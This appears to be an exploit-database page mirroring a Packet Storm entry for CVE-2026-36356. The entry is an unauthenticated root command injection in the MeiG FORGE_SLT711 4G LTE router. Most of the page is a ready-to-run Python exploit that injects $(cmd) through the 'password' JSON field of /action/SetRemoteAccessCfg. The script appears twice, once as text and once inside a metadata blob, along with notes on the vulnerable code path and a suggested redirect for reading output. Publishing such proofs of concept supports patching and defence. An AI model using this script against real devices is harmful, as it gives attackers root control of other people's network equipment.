📄 MeiG Smart FORGE_SLT711 Command Injection_PACKETSTORM:222181

9.1 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Description

MeiG Smart FORGESLT711 proof of concept remote command injection exploit...

Visit Original Source

Basic Information

ID PACKETSTORM:222181

Published May 29, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: MeiG Smart FORGE_SLT711 - OS Command Injection
# Date: 2026-05-03
# Exploit Author: Daniil Gordeev
# Vendor Homepage: http://www.meigsmart.com
# Software Link: N/A (firmware distributed via carrier channels)
# Version: Firmware MDM9607.LE.1.0-00110-STD.PROD-1 (likely all firmware versions of this product line)
# Tested on: MeiG FORGE_SLT711 (Ortel 4G LTE CPE), Qualcomm MDM9607, Linux 3.18.48
# CVE: CVE-2026-36356
"""
Unauthenticated RCE — MeiG FORGE_SLT711 (Ortel 4G LTE CPE)
GoAhead /action/SetRemoteAccessCfg OS command injection

Vuln: JSON "password" field → sprintf("echo root:\"%s\"|chpasswd") → system()
Auth: None (endpoint missing from route.txt auth list)
Root: Commands execute as uid=0(root)
Type: Blind — output not in HTTP response, use --cmd "cmd > /tmp/out" to exfil

Discovered: 2026-02-21
Tested on: FW MDM9607.LE.1.0-00110-STD.PROD-1
"""

import argparse
import json
import sys
import urllib.request
import urllib.error

def exploit(ip: str, cmd: str, port: int = 80, timeout: int = 10) -> bool:
url = f"http://{ip}:{port}/action/SetRemoteAccessCfg"
payload = json.dumps({"password": f"$({cmd})"})

req = urllib.request.Request(
url,
data=payload.encode(),
headers={"Content-Type": "application/json"},
method="POST",
)

try:
with urllib.request.urlopen(req, timeout=timeout) as resp:
body = resp.read().decode()
data = json.loads(body)
if data.get("retcode") == 0:
print(f"[+] retcode:0 — command executed as root")
return True
else:
print(f"[-] Unexpected response: {body}")
return False
except urllib.error.URLError as e:
print(f"[-] Connection failed: {e}")
return False
except Exception as e:
print(f"[-] Error: {e}")
return False

def main():
p = argparse.ArgumentParser(
description="MeiG SLT711 GoAhead unauthenticated RCE (blind)",
epilog="Example: %(prog)s --ip 192.168.1.1 --cmd 'id > /tmp/out'",
)
p.add_argument("--ip", default="192.168.1.1", help="Target IP (default: 192.168.1.1)")
p.add_argument("--port", type=int, default=80, help="Target port (default: 80)")
p.add_argument("--cmd", required=True, help="Command to execute as root (blind, no output returned)")
p.add_argument("--timeout", type=int, default=10, help="HTTP timeout in seconds (default: 10)")
args = p.parse_args()

print(f"[*] Target: {args.ip}:{args.port}")
print(f"[*] Command: {args.cmd}")
print(f"[*] Payload: $({{cmd}}) inside password field")

ok = exploit(args.ip, args.cmd, args.port, args.timeout)
sys.exit(0 if ok else 1)

if __name__ == "__main__":
main()

{
    "lastseen": "2026-05-29T16:17:25",
    "description": "MeiG Smart FORGESLT711 proof of concept remote command injection exploit...",
    "published": "2026-05-29T00:00:00",
    "modified": "2026-05-29T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 MeiG Smart FORGE_SLT711 Command Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:222181",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-36356"
    ],
    "sourceData": "# Exploit Title: MeiG Smart FORGE_SLT711 - OS Command Injection\n    # Date: 2026-05-03\n    # Exploit Author: Daniil Gordeev\n    # Vendor Homepage: http://www.meigsmart.com\n    # Software Link: N/A (firmware distributed via carrier channels)\n    # Version: Firmware MDM9607.LE.1.0-00110-STD.PROD-1 (likely all firmware versions of this product line)\n    # Tested on: MeiG FORGE_SLT711 (Ortel 4G LTE CPE), Qualcomm MDM9607, Linux 3.18.48\n    # CVE: CVE-2026-36356\n    \"\"\"\n    Unauthenticated RCE \u2014 MeiG FORGE_SLT711 (Ortel 4G LTE CPE)\n    GoAhead /action/SetRemoteAccessCfg OS command injection\n    \n    Vuln:  JSON \"password\" field \u2192 sprintf(\"echo root:\\\"%s\\\"|chpasswd\") \u2192 system()\n    Auth:  None (endpoint missing from route.txt auth list)\n    Root:  Commands execute as uid=0(root)\n    Type:  Blind \u2014 output not in HTTP response, use --cmd \"cmd > /tmp/out\" to exfil\n    \n    Discovered: 2026-02-21\n    Tested on:  FW MDM9607.LE.1.0-00110-STD.PROD-1\n    \"\"\"\n    \n    import argparse\n    import json\n    import sys\n    import urllib.request\n    import urllib.error\n    \n    def exploit(ip: str, cmd: str, port: int = 80, timeout: int = 10) -> bool:\n        url = f\"http://{ip}:{port}/action/SetRemoteAccessCfg\"\n        payload = json.dumps({\"password\": f\"$({cmd})\"})\n    \n        req = urllib.request.Request(\n            url,\n            data=payload.encode(),\n            headers={\"Content-Type\": \"application/json\"},\n            method=\"POST\",\n        )\n    \n        try:\n            with urllib.request.urlopen(req, timeout=timeout) as resp:\n                body = resp.read().decode()\n                data = json.loads(body)\n                if data.get(\"retcode\") == 0:\n                    print(f\"[+] retcode:0 \u2014 command executed as root\")\n                    return True\n                else:\n                    print(f\"[-] Unexpected response: {body}\")\n                    return False\n        except urllib.error.URLError as e:\n            print(f\"[-] Connection failed: {e}\")\n            return False\n        except Exception as e:\n            print(f\"[-] Error: {e}\")\n            return False\n    \n    def main():\n        p = argparse.ArgumentParser(\n            description=\"MeiG SLT711 GoAhead unauthenticated RCE (blind)\",\n            epilog=\"Example: %(prog)s --ip 192.168.1.1 --cmd 'id > /tmp/out'\",\n        )\n        p.add_argument(\"--ip\", default=\"192.168.1.1\", help=\"Target IP (default: 192.168.1.1)\")\n        p.add_argument(\"--port\", type=int, default=80, help=\"Target port (default: 80)\")\n        p.add_argument(\"--cmd\", required=True, help=\"Command to execute as root (blind, no output returned)\")\n        p.add_argument(\"--timeout\", type=int, default=10, help=\"HTTP timeout in seconds (default: 10)\")\n        args = p.parse_args()\n    \n        print(f\"[*] Target:  {args.ip}:{args.port}\")\n        print(f\"[*] Command: {args.cmd}\")\n        print(f\"[*] Payload: $({{cmd}}) inside password field\")\n    \n        ok = exploit(args.ip, args.cmd, args.port, args.timeout)\n        sys.exit(0 if ok else 1)\n    \n    if __name__ == \"__main__\":\n        main()",
    "sourceHref": "https://packetstorm.news/download/222181",
    "cvss": {
        "score": 9.1,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/222181/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply